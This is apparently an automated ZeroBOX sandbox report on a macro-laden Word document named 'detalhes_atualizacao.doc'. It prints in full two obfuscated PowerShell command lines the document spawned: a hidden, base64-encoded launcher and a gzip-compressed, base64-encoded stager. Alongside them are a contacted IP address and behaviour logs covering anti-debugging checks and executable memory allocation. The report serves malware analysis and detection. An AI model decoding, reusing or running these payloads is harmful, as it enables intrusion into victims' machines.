Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 1, 2022, 12:30 p.m.	Aug. 1, 2022, 12:35 p.m.

Size	85.0KB
Type	Composite Document File V2 Document, Little Endian, Os: MacOS, Version 5.11, Code page: 10000, Author: Bryam Lima Aquiles, Template: Normal.dotm, Last Saved By: Bryam Lima Aquiles, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 25:00, Create Time/Date: Tue Sep 7 22:10:00 2021, Last Saved Time/Date: Tue Sep 7 22:53:00 2021, Number of Pages: 1, Number of Words: 98, Number of Characters: 532, Security: 0
MD5	`a02cfacbf32e9ff66464de27faa58543`
SHA256	`848de91c16469e9f09e284adbbbf8cf317db916b414240c6bd46364a8f4c2c84`
CRC32	`C32BE859`
ssdeep	`1536:6cffffffgffffffd7fffffG9fffffFEffffffurfffYyCwtvLRD4nKmGI+xwtImr:6cffffffgffffffd7fffffSfffffOffx`
Yara	Microsoft_Office_File_Zero - Microsoft Office File Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Antivirus - Contains references to security software

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\detalhes_atualizacao.doc
2788
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
  2976
  - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    2076

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
178.62.247.185	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2022, 12:30 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 1, 2022, 12:30 p.m.			0	0
IsDebuggerPresent Aug. 1, 2022, 12:30 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006006e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006007a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00600fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006afa28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b0128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b0128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b0128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b03e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b03e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b03e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b03e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b03e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2022, 12:30 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b03e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 1, 2022, 12:30 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 293 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76451000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e871000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e874000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
